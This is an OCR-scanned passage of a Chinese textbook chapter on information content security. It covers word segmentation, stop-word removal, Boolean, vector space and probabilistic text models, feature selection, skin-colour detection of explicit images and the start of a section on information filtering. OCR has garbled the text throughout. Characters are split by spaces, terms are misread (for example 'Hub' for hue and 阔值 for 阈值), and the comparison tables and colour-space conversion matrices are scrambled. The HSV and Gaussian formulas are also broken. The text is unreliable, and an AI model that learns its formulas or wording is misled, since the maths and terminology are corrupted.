然而 ,由 于 中 文 语 言 的 笼统 性 和 复杂 性 ,使 得 计算 机 无 法 将 各 种 语言 组 织 成 计算 机 能 
够 处 理 的 形式 。 因 此 ,尽管 该 方法 的 初衷 较 好 ,但 目前 并 没有 得 到 广泛 的 应 用 。 

总 体 而 言 ,这 三 类 分 词 方法 各 有 各 的 优 缺 点 , 表 10-1 对 这 三 种 方法 进行 了 比较 ,特别 
是 在 应 对 中 文 分 词 所 面临 的 两 种 主要 问题 方面 。 
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表 10-1 三 类 分 词 方法 的 比较 


优 缺 点 | 基于 字符 串 匹配 的 分 词 方法 基于 统计 的 分 词 方法 基于 知识 理解 的 分 词 方法 


优点 | GD 实现 简单 (1) 不 需要 基于 切 分 词典 (1) 能 识别 未 登录 词 
” | (2) 分 词 速 度 快 (2) 消除 歧义 (2) 消除 歧义 
了 (1) 经 常 抽出 一 些 共 现 频 度 高 、 
(1) 分词 精度 与 词 库 相关 但 不 是 词 的 常用 字 组 (1) 知识 词 库 复杂 


缺点 | (2) 不 能 发 现 交叉 型 歧义 
(3) 不 能 识别 未 登录 词 


(2) 分 词 精度 与 知识 库 


(2) 不 能 识别 未 登录 词 相关 


(3) 识别 精度 差 ,时 空 开销 大 


2. 去 停 用 词 

在 文本 分 词 的 基础 上 ,需要 去 掉 那 些 常 见 的 ,价值 不 大 的 词 , 即 去 停 用 词 (Stop 
Words)。 去 停 用 词 能 在 不 影响 系统 精度 的 前 提 下 ,有 效 节省 存储 空间 和 计算 时 间 。 常 见 
的 停 用 词 包括 冠 词 . 介 词 .连词 。 

目前 ,去 停 用 词 的 常见 方法 有 查 表 法 和 基于 文档 频率 的 方法 。 具 体 而 言 , 查 表 法 是 预 
先 建立 好 一 个 停 用 词 表 (Stop-list) ,然后 通过 查阅 停 用 词 表 的 方式 过 滤 掉 与 文本 内 容 本 
身 没有 多 大 关系 的 词 条 。 基 于 文档 频率 的 方法 是 通过 统计 每 个 词 的 文档 频率 ,判断 其 是 
和 否 超 过 总 文档 的 某 个 百分比 。 若 超过 所 设 定 的 阔 值 , 则 当 作 停 用 词 去 掉 。 

3. 文本 表示 

文本 表示 是 将 实际 的 文本 内 容 转换 为 计算 机 内 部 的 表示 结构 ,是 文本 内 容 挖 掘 与 分 
析 的 基础 。 在 介绍 具体 文本 表示 之 前 先 给 出 特征 项 和 特征 权重 的 概念 。 

定义 10.4 ”特征 项 (Term): 文本 表示 模型 中 所 用 的 基本 语言 单位 ,如 字 、 词 或 词组 。 

定义 10.5 特征 项 权重 (Term Weight) : 表示 该 特征 项 对 于 文本 内 容 的 重要 程度 ， 
权重 越 高 的 特征 项 越 能 代表 该 文本 的 内 容 。 

最 早 文本 表示 模型 用 于 信息 检索 领域 ,后 来 在 文本 分 类 、 文 本 挖掘 等 领域 也 得 到 广泛 
的 应 用 。 当 前 ,文本 表示 模型 主要 有 : 

(1) 基于 集合 论 的 模型 (Set Theoretic-based models)。 基 于 集合 论 的 模型 包括 : 布 
尔 模型 ,扩展 布尔 模型 和 基于 模糊 集 的 模型 等 。 这 里 仅 介绍 典型 的 布尔 模型 (Boolean 
Model) 。 布 尔 模型 建立 在 集合 理论 和 布尔 代数 的 基础 上 ,是 一 个 严格 的 基于 查询 特征 项 
匹配 的 模型 。 该 模型 将 文本 表示 为 特征 空间 上 的 一 个 向 量 ,向 量 中 每 个 分 量 是 二 值 变 量 。 
查询 特征 项 之 间 通 过 逻辑 运算 符 AND、OR 和 NOT 相连 ,其 与 文本 之 间 的 匹配 方式 遵循 
布尔 表达 式 的 运算 规则 。 若 查询 的 特征 项 表达 式 与 文本 相 匹 配 , 则 文本 被 检索 出 来 ,返回 
1 ;否则 文本 不 被 检索 出 来 ,返回 0。 

可 见 ,布尔 模型 比较 简单 ,容易 理解 ,被 应 用 于 商业 检索 系统 ,如 DIALOG、STAIRS 
等 。 然 而 ,把 布尔 模型 用 作文 本 表示 具有 一 定 的 缺陷 : 基于 严格 的 特征 项 匹配 ,不 能 提供 
近似 或 部 分 匹配 ;查询 结果 是 1 或 者 0, 不 能 反映 特征 项 对 文本 的 重要 程度 ,排序 能 力 差 ; 
构造 的 查询 决定 了 查询 的 结果 的 多 少 , 同 时 对 于 一 些 复杂 的 用 户 需求 也 较 难 表达 。 

(2) 基于 代数 论 的 模型 (Algebraic-based models)。 典 型 的 基于 代数 论 的 模型 有 : 向 
量 空间 模型 潜在 语义 索引 模型 和 神经 网 络 模 型 等 。 这 里 介绍 广泛 应 用 的 向 量 空间 模型 
(Vector Space Model,VSM) 。 该 模型 是 由 Cornell 大 学 的 G. Salton 等 在 20 世纪 70 年 
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代 提 出 的 ,最 早 应 用 于 信息 检索 领域 ,其 原型 系统 为 SMART。 

VSM 的 两 个 基本 假设 : @ 一 个 文本 所 属 的 类 别 仅 与 某 些 特征 项 在 该 文本 中 出 现 的 
词 频 有 关 , 而 与 这 些 特征 项 在 该 文本 中 出 现 的 位 置 或 顺序 无 关 。@ 特 征 项 与 特征 项 之 间 
是 互 异 且 相 互 独立 的 。VSM 的 主要 思想 : 不 考虑 特征 项 在 文本 中 出 现 的 先后 顺序 ,将 文 
本 表示 为 互 异 且 相互 独立 的 特征 项 的 组 合 向 量 , 以 不 同 的 特征 项 构造 一 个 高 维 空间 ,每 个 
特征 项 为 该 空间 中 的 一 维 ,文本 则 被 表示 为 该 空间 中 的 一 个 向 量 。 

具体 地 ,对 于 一 个 文本 d, 用 个 互 异 的 特征 项 表示 为 : 

(<disw >, <disw > < ds, >) 
其 中 d; 表示 该 文本 的 特征 项 ,rw; 为 该 特征 项 在 该 文本 中 的 权重 ,最 为 经 典 的 权重 计算 方 
法 是 TF-IDF, 由 于 篇 幅 问 题 详细 的 细节 可 参见 G. Salton 在 1988 年 发 表 的 另 一 篇 文献 
[30]。 查 询 也 是 一 个 文本 ,用 VSM 表示 为 ; 

(qrwi>, < gw > < gw >) 

若 要 计算 查询 与 文本 之 间 的 相似 性 ,最 直接 简单 的 方法 是 计算 它们 之 间 的 余弦 值 ， 
如 下 : 

Dwix TO 


Sim(g,d) = cos0 -= ; 
[Su [Ba 
此 外 ,还 有 其 他 各 种 计算 该 相似 性 的 方法 ,如 Dice 系数 、Jaccard 系数 等 。 

可 见 ,VSM 能 有 效 克 服 布尔 模型 的 缺陷 , 即 能 根据 需要 对 查询 中 的 特征 项 的 重要 性 
进行 个 性 化 赋值 ;支持 部 分 匹配 和 近似 匹配 ,结果 可 以 排序 ;通过 权重 计算 方法 能 有 效 提 
高 系统 的 检索 性 能 。 然 而 ,其 前 提 假 设 之 一 是 特征 项 之 间 的 相互 独立 性 与 实际 不 符 。 实 
际 特 征 项 之 间 是 存在 一 定 关系 的 ,如 :“ 信 息 ”“ 技 术 ”; 另 外 也 没有 考虑 特征 项 在 类 别 间 
的 分 布 情况 。 

(3) 基于 概率 的 模型 (Probabilistic-based models)。 根 据 前 面 的 分 析 , 布 尔 模型 和 
VSM 都 存在 没有 考虑 特征 项 之 间 的 关联 性 的 这 一 缺陷 。 概 率 模型 则 是 利用 特征 项 与 特 
征 项 之 间 以 及 特征 项 与 文本 之 间 的 概率 关系 进行 信息 检索 。 常 见 的 基于 概率 的 统计 模型 
有 : 经 典 概率 模型 回归 模型 推理 网 络 模型 等 。 

这 里 介绍 经 典 概率 模型 ,其 主要 思想 : 根据 用 户 的 查询 gq, 可 将 文本 分 为 与 查询 g 相 
关 的 集合 尺 ,与 查询 g 不 相关 的 集合 R。 在 同一 类 文本 中 ,各 检索 特征 项 具有 相同 或 相近 
的 分 布 ;而 属于 不 同类 的 文本 中 ,检索 特征 项 具有 不 同 的 分 布 。 因 此 ,可 通过 计算 文本 中 
所 有 检索 特征 项 的 分 布 ,就 可 以 判定 该 文本 与 检索 的 相关 度 。 具 体 的 相似 度 函 数 定义 为 : 


= Rd 
Sim(g,d) = FOR 
其 中 PCR1d) 表 示 文 本 d 和 查询 gq 相关 的 概率 ; PC(R1d) 表 示 文 本 d 和 查询 g 不 相关 的 


概率 。 
该 值 越 大 说 明文 本 4 与 查询 g 更 相关 。 由 于 检索 特征 项 的 数量 较 大 ,为 了 简化 计算 
过 程 , 引 入 了 不 同 的 假设 ,最 常见 的 模型 有 : 二 元 独立 模型 (Binary Independent Model) 、 
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二 元 一 阶 依赖 模型 (Binary First Order Dependent Model) 和 双 Poisson 分 布 模型 (Two 
Poisson Independent Model) ,有 关 这 些 模 型 的 更 为 详细 介绍 可 参见 文献 [32]。 

总 之 ,概率 模型 建立 在 数学 基础 上 ,理论 性 较 强 ;文本 可 以 按照 相关 概率 递减 的 顺序 
进行 排序 ,同时 较 好 地 体现 了 文本 信息 的 不 确定 性 ,模糊 性 ;但 过 于 依赖 所 处 理 的 文本 集 
的 内 容 。 

4. 特征 提取 

上 述 过 程 得 到 的 文本 原始 特征 项 可 能 处 在 一 个 高 维 空间 中 ,将 耗费 较 多 的 系统 存储 
内 存 和 处 理 时 间 。 因 此 ,如 何 从 原始 特征 项 中 选择 一 些 具有 代表 性 的 有 效 特 征 作为 新 的 
特征 集 , 是 解决 “维度 灾难 ”的 有 效 途 径 。 具 体 而 言 , 文 本 的 特征 提取 是 指 从 文本 信息 中 抽 
取 能 够 代表 该 类 文本 或 文本 信息 内 容 的 过 程 。 文 本 特征 提取 可 以 实现 以 下 目的 : 降低 文 
本 空间 的 维度 和 稀 玻 度 ,提高 文本 内 容 识 别 和 分 析 的 性 能 ;所 选择 数量 较 少 的 特征 项 更 直 
接 的 反映 文本 主题 ,方便 用 户 对 文本 内 容 的 理解 ;能 一 定 程度 上 去 掉 有 干扰 的 噪声 特征 
项 ,增强 文本 之 间 相 似 度 的 准确 性 。 

当前 特征 提取 的 方法 可 采用 人 工 处 理 和 计算 机 自动 处 理 ,其 中 人 工 处 理 是 基于 人 的 
知识 提取 文本 内 容 的 代表 性 特征 。 然 而 ,该 方法 具有 一 定 的 缺陷 : 人 的 工作 量化 较 大 , 且 
需要 领域 专家 的 参与 ;选择 结果 不 便于 动态 调整 ,除非 人 工 不 断 地 进行 该 工作 。 另 外 一 种 
常用 的 方法 是 利用 计算 机 自动 化 处 理 , 首 先 通过 造 一 个 评价 函数 ,对 文本 特征 集中 的 每 一 
个 特征 进行 独立 的 评估 ,这 样 每 个 特征 都 获得 一 个 评估 分 ;然后 对 所 有 的 特征 按照 其 评估 
得 分 的 大 小 进行 排序 ;选取 预定 数目 的 最 佳 特征 作为 结果 的 特征 子 集 。 至 于 选取 多 少 个 
最 佳 特征 以 及 采用 什么 评价 函数 都 需要 针对 一 个 具体 的 问题 通过 实验 来 确定 。 

当前 常见 的 特征 提取 评价 函数 有 : 文档 频率 DF(Document Frequency)、 互 信息 MI 
(Mutual Information) ,信息 增益 IG(Information Gain) ,x? 统计 量 (CHI-square) ,交叉 
CE(Cross Entropy) 等 ,具体 介绍 这 里 不 再 详 述 ,可 参见 文献 [33] 。 


1032 图 像 内 容 识 别 与 分 析 


当前 ,图 像 比 文本 更 能 提供 一 些 直观 ,丰富 的 信息 ,因而 不 良 图 像 比 不 良 文 本 更 具有 
危害 性 。 以 图 像 处 理 与 图 像 理解 技术 为 基础 的 不 良 图 像 内 容 识别 与 分 析 是 实现 不 良 图 像 
过 滤 的 基础 ,是 信息 内 容 安 全 的 一 个 重要 组 成 部 分 。 本 节 主 要 介绍 不 良 图 像 的 识别 方法 。 

不 良 图 像 信 息 识别 即 是 判断 一 副 图 像 中 是 否 有 含有 不 良 的 信息 ,这 里 的 不 良 信息 主 
要 是 指 裸露 的 人 体 敏感 部 位 。 一 般 可 通过 图 像 的 基本 特征 进行 识别 ,典型 的 特征 有 肤色 、 
纹理 ,形状 .轮廓 等 。 当 前 互联 网 上 的 不 良 图 像 一 般 是 彩色 图 像 , 并 且 很 多 时 候 呈 现 大 面 
积 的 裸露 皮肤 ,因此 本 节 主 要 以 肤色 特征 为 例 ,介绍 如 何 通 过 肤色 检测 技术 实现 不 良 图 像 
的 识别 ,其 中 如 何 从 不 良 图 像 中 分 割 出 肤色 区 域 是 肤色 检测 算法 的 前 提 。 

1. 数字 图 像 表示 

图 像 根据 像素 空间 坐标 和 亮度 的 连续 性 可 分 为 模拟 图 像 和 数字 图 像 , 其 中 模拟 图 像 
是 通过 物理 量 的 强 弱 变化 来 记录 图 像 上 各 点 的 亮度 信息 的 图 像 , 即 是 人 眼见 到 的 物理 图 
像 ;而 数字 图 像 是 指 完 全 用 数字 来 记录 图 像 亮度 信息 。 

通过 空间 采样 ,亮度 量化 过 程 可 实现 模拟 图 像 到 数字 图 像 的 转化 过 程 ,因此 ,数字 图 
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像 可 用 空间 坐标 及 对 应 的 亮度 值 来 表示 ,基本 元 素 为 像素 。 数 字 图 像 一 般 采 用 和 矩阵 形式 
来 存储 ,如 对 于 一 个 灰 度 图 像 可 表示 为 1x, 二 (1(i,j))wx, ,其 中 I(i, 站 表示 坐标 为 (i,j) 
的 像素 点 的 灰 度 值 ,其 取 值 范围 为 0( 全 黑 ) 一 255( 全 白 ); 对 于 一 个 彩色 图 像 Cx, = 
(CG,J))wxw，* 每 个 像素 C(i,j) 由 RGB 三 原色 构成 ,其 中 RGB 是 由 灰 度 值 来 描述 。 

2. 颜色 度量 

颜色 是 人 的 视觉 系统 对 可 见 光 的 感知 结果 ,感知 到 的 颜色 由 光波 的 波长 所 决定 。 在 
图 像 数 字 化 中 ,首先 得 考虑 如 何 利用 数字 来 描述 颜色 。 国 际 照明 委员 会 (International 
Commission on Jllumination ,ICT) 定 义 了 颜色 固有 且 截 然 不 同 的 三 个 要 素 : 

(1) 色调 (Hub): 又 称 色相 , 当 人 眼看 一 种 或 多 种 波长 的 光 时 所 产生 的 色彩 感觉 ,是 
使 一 种 颜色 区 别 于 另 一 种 颜色 的 要 素 , 如 红 、 橙 、. 黄 等 。 它 与 下 面 的 饱和 度 统称 为 色 度 。 

(2) 饱和 度 (Saturation) : 指 颜色 的 纯度 ,表现 颜色 的 深浅 程度 。 一 种 特定 的 颜色 可 
以 看 成 是 某 种 纯 光 谱 色 与 白色 的 混 色 结 果 ,光谱 色 的 比例 越 大 , 则 该 颜色 接近 纯 光 谱 色 的 
程度 就 越 高 ,颜色 纯度 就 越 高 。 例 如 鲜红 色 的 饱和 度 比 粉 红色 的 饱和 度 高 。 

(3) 明度 (Brightness): 又 称 为 亮度 ,是 人 眼 对 光源 和 物体 表面 的 明暗 程度 的 感觉 ， 
主要 是 由 光线 强 弱 决 定 的 一 种 视觉 经 验 。 对 于 非 彩色 而 言 ,其 没有 色调 和 饱和 度 的 概念 
而 只 有 亮度 的 差别 。 

3. 颜色 空间 

颜色 空间 ,又 称 为 颜色 坐标 系 ,在 机 器 视觉 中 一 般 称 为 颜色 模型 ,是 颜色 在 三 维 空间 
中 的 排列 方式 。 一 般 地 ,颜色 可 通过 三 个 相对 独立 的 属性 来 描述 ,这 三 个 属性 可 看 作 是 三 
维 坐 标 系 中 的 三 个 不 同 的 维度 ,它们 的 综合 作用 构成 了 一 个 空间 坐标 , 即 为 颜色 空间 。 对 
于 同一 颜色 而 言 , 可 从 不 同 的 角度 去 度量 , 即 通过 三 个 一 组 的 不 同属 性 所 构成 的 不 同 颜色 
空间 进行 描述 。 常 见 的 颜色 空间 有 

(1) 基础 颜色 空间 。 基 础 颜色 空间 主要 有 : RGB 颜色 空间 、 归 一 化 RGB 颜色 空间 以 
及 CIE-XYZ 颜色 空间 。 具 体 而 言 ,RGB 颜色 空间 是 将 红色 (Red)、 绿 色 (Green) 和 蓝 色 
(Blue) 这 三 种 基本 颜色 当 作 三 维 空间 的 三 个 维度 ,其 中 每 个 维度 灰 度 值 的 取 值 范围 为 
0 一 255。 通 过 它们 不 同 程度 的 释 加 产生 256: 种 颜色 ,几乎 覆盖 了 人 类 视觉 系统 所 能 感知 
的 所 有 颜色 。 然 而 .RGB 颜色 空间 容易 受到 光照 或 阴影 的 影响 ,因此 ,通过 将 RGB 值 归 
一 化 形成 归 一 化 RGB 颜色 空间 ,从 而 消除 部 分 光照 对 其 的 影响 。 

尽管 RGB 颜色 空间 在 彩色 光栅 图 像 等 显示 器 系统 中 得 到 广泛 的 应 用 ,但 是 R.G、B 
三 个 分 量 之 间 相 关 度 较 高 , 且 将 色调 .饱和 度 和 亮度 混在 一 起 ,因此 不 适合 对 亮度 多 变 的 
图 像 进行 肤色 检测 。 

(2) 正 交 颜 色 空间 。 正 交 颜 色 空 间 利用 人 眼 对 色彩 敏感 度 低 于 对 亮度 敏感 度 的 特 
性 ,通过 将 RGB 颜色 空间 表示 的 彩色 图 像 变换 到 其 他 彩色 空间 ,实现 亮度 和 色 度 信号 的 
分 离 ,从 而 降低 RGB 颜色 空间 宛 余 ,提高 颜色 信息 的 传输 效率 ,典型 的 正 交 颜色 空间 有 : 
YUV、YIQ、YCbCr 等 。 

YUV 颜色 空间 被 欧洲 电视 系统 所 采用 ,用 于 PAL 制式 的 电视 系统 ,其 中 Y 表示 亮 
度 ,U 和 V 代表 的 是 色差 ,一 般 是 与 蓝 色 和 红色 的 相对 值 ,其 与 RGB 颜色 空间 的 转换 关 
系 如 下 : 
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R 

一 0.147 一 0.289 0.436 四 

V 0.615 一 0.515 一 0.100 八 B 

YIQ 颜色 空间 与 YUV 类 似 , 被 北美 电视 系统 所 采用 ,用 于 NTSC 制式 的 电视 系统 ， 

只 不 过 工 和 Q 分 量 是 将 U 和 分 量 进行 了 33* 的 旋转 ,其 与 RGB 颜色 空间 的 转换 关系 
如 下 : 


0.299 0.587 0.114 
U|= 


XE 0.299 0.587 0.114)(R 
T |=|10.596 一 0.275 —0.321 |IG 
Q 0.212 一 0.523 0.311 八 了 


YCbCr 颜色 空间 是 由 YUV 颜色 空间 派生 的 一 种 颜色 空间 ,主要 用 于 数字 电视 系统 ， 
其 中 Cs .C, 分 别 表示 蓝 色 差 信号 和 红色 差 信号 ,其 与 RGB 颜色 空间 的 转换 关系 为 : 


Y 0.299 0.587 0.114 R 0 
C;|= |—0.1687 一 0.3313 0. 5000 ||G |+ |128 
CG 0.500 一 0.4187 一 0.0813 八 B 128 


(3) 认 知 颜色 空间 。 认 知 颜色 空间 用 以 解决 基础 颜色 空间 中 不 能 从 颜色 RGB 值 中 
直观 地 知道 颜色 的 色 度 和 亮度 的 问题 ,典型 的 认 知 颜色 空间 有 : HIS HSV 、HSL 和 TSL 
等 。 这 里 以 HSV 为 例 进行 介绍 ,HSV 颜色 空间 是 从 人 的 视觉 系统 出 发 ,用 色调 、 饱 和 度 
和 亮度 来 描述 颜色 。 一 般 可 用 圆锥 体 进行 可 视 化 表达 ,色调 被 表示 为 绕 圆锥 中 心 轴 的 角 
度 , 饱 和 度 被 表示 从 圆锥 的 横 截 面 的 圆心 到 这 个 点 的 距离 ,明度 被 表示 为 从 圆锥 的 横 截 面 
的 圆心 到 顶点 的 距离 。 

车 (r,g,6b) 代 表 RGB 颜色 空间 中 一 个 颜色 的 红 、 绿 、 蓝 坐标 ,其 取 值 为 0 到 1 之 间 的 
实数 , 令 maxV 二 max{r,g,0),minV 二 min{r,g,60);(h,s,v) 代 表 HSV 空间 中 色调 ,饱和 
度 和 亮度 , 则 从 RGB 到 HSV 的 转换 关系 如 下 : 

0” 当 maxV = minV 


ox 8b _ 。 i 全 
60. Xi 十 0 当 maxV 一 -~ 且 g 二 1 


60°X 0 0 yin = rg 


h= maxV — minV 
o b—r o y a 
60° Xx = 十 120” 当 maxV=g 
o 六 一 区 oy Se 
60 XxX = 十 240” 当 maxV = 二 6 
0 当 maxV 一 0 
5 maxV — minV minWw 
| maxV ! maxW 其 他 
v= maxV 
反之 ,从 HSV 到 RGB 的 转换 可 表示 为 : 
首先 计算 : 
h 
h =|55 |mod 6， f= 8 一 3; 
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p=vX(1—s), g=vX(—fXs), t=vxX(—(1—N Xs) 
则 在 颜色 空间 RGB 中 的 每 个 颜色 (r,g .5) ,可 计算 如 下 : 
(vstsp) 当 h=0 
(gpy Sh=1 
es (psvst) 当 h;=2 
(psgsv) 当 h;=3 
(tpsv) 当 太 一 4 
(v,prg) 当 h;=5 
肤色 一 般 在 颜色 空间 中 相当 集中 ,但 会 受到 照明 和 人 种 的 影响 。 为 了 减少 肤色 受 照 
明 强 度 影响 ,通常 将 颜色 空间 从 RGB 转换 到 亮度 和 色 度 分 离 的 某 个 空间 中 ,如 YCbCr 或 
HSV ,然后 放弃 亮度 分 量 。 在 双色 差 或 色调 饱和 度 平面 上 ,不 同人 种 的 肤色 变化 不 大 , 肤 
色 的 差异 性 更 多 的 是 存在 于 亮度 而 不 是 色 度 。 
4. 肤色 模型 
这 里 本 节 仅 介绍 静态 肤色 模型 ,当前 静态 肤色 模型 主要 有 : 阔 值 法 .参数 化 法 和 非 参 
数 化 法 ,这 里 以 肤色 范围 .高 斯 分 布 模型 和 统计 直方 图 模型 为 例 进行 介绍 。 
(1) 阔 值 法 。 该 模型 直接 用 数学 表达 式 明确 规定 肤色 的 范围 ,是 一 种 简单 的 肤色 建 
模 方法 。 检 测 时 只 需要 用 二 值 查找 表 即 可 。 该 模型 实现 起 来 很 简单 ,但 要 想 取得 好 的 检 
测 效果 ,需要 解决 两 个 问题 : 四 如 何 选择 合适 的 颜色 空间 ; 四 如 何 确定 规则 中 的 参数 。 
(2) 参数 化 法 。 常 用 的 利用 参数 化 法 进行 肤色 检测 的 模型 有 : 高 斯 分 布 模型 .椭圆 
边界 法 、 聚 群 法 等 。 这 里 以 高 斯 分 布 模型 为 例 ; 
高 斯 分 布 模型 是 一 种 参数 化 模型 ,可 分 为 单 高 斯 模型 (Single Gaussian model, SGM) 
和 高 斯 混合 模型 (Gaussian mixture models,GMM)。 
@ 单 高 斯 模型 采用 椭圆 高 斯 联合 概率 密度 函数 : 


plz | skin) sep| yx AZ 一 人] 
2 


1 
2x| | 
其 中 z 是 像素 颜色 向 量 , 均 值 向 量 y. 和 协 方差 矩阵 >) 是 高 斯 分 布 参 数 , 由 训练 样本 估计 : 


p= > zs A zi 一 AT 
上 述 条 件 概率 pCz|skin) 可 以 直接 用 来 衡量 像素 x 属于 肤色 的 可 能 性 ,也 可 以 通过 
高 斯 分 布 参 数 计算 输入 像素 x 与 均值 4 的 马 氏 距离 4 二 (x 一 /7 了 (x 一 yw) 来 表示 像 
素 与 肤色 模型 的 接近 程度 。 
总 体 而 言 , 若 pzlskin)>e 或 4<8. 则 < 为 肤色 ,其 中 x,B 为 定义 的 阔 值 。 
@ 高 斯 混合 模型 。 高 斯 混合 模型 是 一 个 有 效 描述 复杂 形状 分 布 的 模型 , 它 是 由 单 高 
斯 肤色 模型 经 过 一 般 化 后 得 到 的 , 即 可 表示 为 ， 


plz | skin) = Dw 。 pi(x | skin) 
其 中 混合 成 分 的 个 数 ,w; 是 混合 权重 ,pi(x|skin) 是 高 斯 概率 密度 函数 族 ,每 个 都 有 其 
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自己 的 均值 j 与 协 方差 矩阵 >) , 其 参数 可 通过 期 望 最 大 化 EM 算法 得 到 。 

对 于 其 判断 方法 与 单 高 斯 模型 一 样 ,可 通过 条 件 概率 p(x|skin) ,也 可 以 通过 像素 与 
肤色 模型 之 间 的 马 氏 距离 进行 计算 。 

(3) 非 参 数 化 法 。 非 参数 化 法 比 参数 化 法 更 适应 于 不 同 摄像 机 、 不 同 环境 下 获取 图 
像 肤 色 建 模 。 常 用 的 非 参数 化 法 有 : 统计 直方 图 模型 .神经 网 络 模型 等 。 这 里 以 统计 直 
方 图 模型 为 例 : 

统计 直方 图 模型 是 给 离散 化 的 颜色 空间 中 的 每 个 格子 赋予 一 个 概率 值 , 得 到 肤色 概 
率 图 (Skin Probability Map,SPM) ,利用 SPM 进行 肤色 检测 。 当 前 ,常用 的 方法 有 正则 
化 查 表 法 和 贝 叶 斯 分 类 器 。 

Q@ 正则 化 查 表 法 。 直 接 利用 SPM 作为 肤色 概率 查找 表 。 将 输入 像素 的 颜色 向 量 经 
过 与 SPM 相同 的 颜色 空间 变换 和 量化 后 所 得 到 的 向 量 作为 查 表 的 索引 , 查 表 得 到 的 值 
是 该 输入 像素 属于 肤色 的 概率 。 换 句 话 , 这 里 的 肤色 概率 即 是 肤色 训练 样本 在 这 种 颜色 
上 所 出 现 的 相对 频数 : 


Count(zx) 
Norm 


其 中 Count(z) 是 训练 样本 中 颜色 空间 向 量 z 的 像素 个 数 ,规则 化 参数 Norm 是 训练 样本 
中 的 像素 个 数 的 总 数目 。 

@ 贝 叶 斯 分 类 器 。 正 则 化 查 表 法 中 的 pws (7) 只 是 估计 条 件 概 率 p(x|skin) ,对 肤色 
检测 更 合适 的 度量 应 该 是 p(skin|z) , 则 计算 如 下 : 


plzx | skin)p(skin) 
plz | skin) p(skin)+ p(x |-skin)p(—skin) 


其 中 p(xz|skin) 和 p(xz|-skin) 分 别 表 示 皮 肤 直 方 图 中 肤色 和 非 肤 色 像 素数 目的 比例 。 
若 p(skin|z) 大 于 某 阅 值 时 , 则 有 颜色 z 的 像素 被 判断 为 皮肤 像素 。 


10.4 信息 内 容 控制 和 管理 


在 信息 内 容 识别 与 分 析 的 基础 上 ,对 于 不 良 的 信息 内 容 应 进行 过 滤 阻 断 ,对 私密 信息 
应 实现 有 效 的 隐藏 ,对 涉及 版 权 的 信息 内 容 应 加 以 保护 。 本 节 主 要 从 信息 过 滤 、 信 息 隐 藏 
及 数字 水 印 与 版 权 保护 三 个 方面 介绍 有 关 信 息 内 容 控 制 与 管理 方面 的 相关 技术 。 
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当前 ,海量 增长 的 互联 网 信息 加 剧 了 信息 查找 的 难度 ,同时 不 法 分 子 通过 网 络 散布 反 
动 .暴力 黄色 、 那 教 等 信息 内 容 严 重 扰乱 人 们 的 健康 生活 和 社会 的 稳定 。 信 息 过 滤 一 方 
面 可 以 帮助 人 们 从 海量 信息 中 找到 所 需 的 信息 ,有 效 地 缓解 了 信息 过 载 的 问题 ; 另 一 方面 
作为 一 种 信息 内 容 控制 技术 ,通过 过 滤 各 类 不 良 信息 ,为 用 户 营造 一 个 健康 的 互联 网 环境 
提供 了 一 种 技术 保障 。 作 为 信息 过 载 和 信息 内 容 安全 的 一 种 有 效 解决 方法 ,信息 过 滤 得 
到 业界 的 广泛 关注 。 本 节 主 要 介绍 信息 内 容 过 滤 流 程 及 相关 技术 ,在 下 一 节 中 将 以 具体 
的 电子 邮件 为 实例 ,介绍 信息 内 容 过 滤 技 术 的 具体 实践 应 用 。 


Psin (I) es. 


plskin | x) 
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1. 信息 过 滤 概 念 

信息 过 滤 (Information Filtering,IF) 最 早出 现在 1982 年 ,ACM 主席 Peter Denning 
在 CACM 期 刊 中 指出 不 仅 要 研究 电子 文本 的 自动 生成 和 扩散 途径 ,同时 也 要 研究 对 接收 
到 的 信息 进行 有 效 控 制 , 即 信息 过 滤 。 随 后 ,在 1987 年 ,Malone 等 提出 社会 过 滤 的 概念 ， 
即 基于 以 前 用 户 对 文本 的 标注 来 表示 文本 ,通过 交换 信息 自动 识别 具有 共同 兴趣 的 团体 。 
目前 ,信息 过 滤 没 有 统一 的 定义 ,如 Belkin 和 Croft 定义 IF 是 用 来 描述 将 信息 传递 给 有 
需要 的 用 户 的 一 系列 过 程 的 总 称 ; Hanani 等 定义 IF 是 指 从 动态 信息 流 中 将 满足 用 户 兴 
趣 的 信息 挑选 出 来 ,用 户 的 兴趣 一 般 在 较 长 一 段 时 间 内 不 会 改变 。IF 通常 是 在 输入 数据 
流 中 移 除数 据 , 而 不 是 在 输入 数据 流 中 找到 数据 。 

一 般 地 ,IF 指 根 据 用 户 的 信息 需求 模型 (User Profile) ,在 动态 的 信息 流 ( 如 Web， 
Email) 中 ,搜索 用 户 感 兴趣 的 信息 ,屏蔽 其 他 无 用 的 和 不 良 的 信息 。 用 户 需 求 模型 (User 
Profile) 是 信息 过 滤 的 主要 依据 ,以 计算 机 可 以 理解 的 形式 揭示 用 户 的 兴趣 爱好 。 根 据 过 
滤 的 目的 不 同 ,IF 既 可 以 用 来 收集 有 益 的 信息 ,也 可 以 用 来 屏蔽 有 害 的 信息 。 这 里 本 节 
更 多 的 讨论 后 者 , 即 以 信息 内 容 安全 为 出 发 点 ,为 用 户 去 除 可 能 危害 的 信息 , 阻 断 其 进 一 
步 传输 。 

信息 过 滤 与 信息 检索 (Information Retrieval, IR) 密 切 相 关 , 它 们 都 是 对 用 户 某 一 特 
定 的 信息 需求 进行 搜索 ,但 其 与 信息 检索 有 所 不 同 。 下 面 从 需求 ,信息 源 、 目 标 及 用 户 特 
点 等 方面 进行 比较 ,它们 的 差别 见 表 10-2 所 示 。 


表 10-2 IR 和 IF 比较 


比较 类 别 信息 检索 IR 信息 过 滤 IF 
需求 表示 查询 表达 式 兴趣 模型 

需求 变化 动态 静态 

信息 源 静态 动态 

目标 选择 相关 条 目 过 滤 掉 不 相关 的 条 目 
了 解 用 户 否 是 

用 户 特点 短期 使 用 长 期 使 用 


在 IR 中 ,用 户 通常 基于 查询 表达 式 进行 信息 检索 ,因而 信息 需求 的 变化 率 是 比较 快 
的 ,但 是 被 检索 的 信息 源 的 变化 率 是 比较 缓慢 的 , 即 IR 是 根据 用 户 的 特定 信息 需求 ,在 
静态 的 信息 源 中 ,检索 与 用 户 需求 相关 的 信息 条 目 ,屏蔽 无 用 的 信息 ,用 户 的 信息 需求 行 
为 是 一 个 短期 行为 。 在 IF 中 ,用 户 通过 构建 用 户 需求 (User Profile) 模 型 来 实现 信息 过 
滤 ,一般 来 说 ,用 户 的 兴趣 在 一 段 时 间 内 可 认为 变化 不 大 , 即 用 户 的 需求 变化 是 静态 的 ;但 
是 数据 源 是 将 要 到 达 的 动态 数据 流 , 即 IF 是 根据 用 户 的 信息 需求 ,在 动态 信息 源 中 ,搜索 
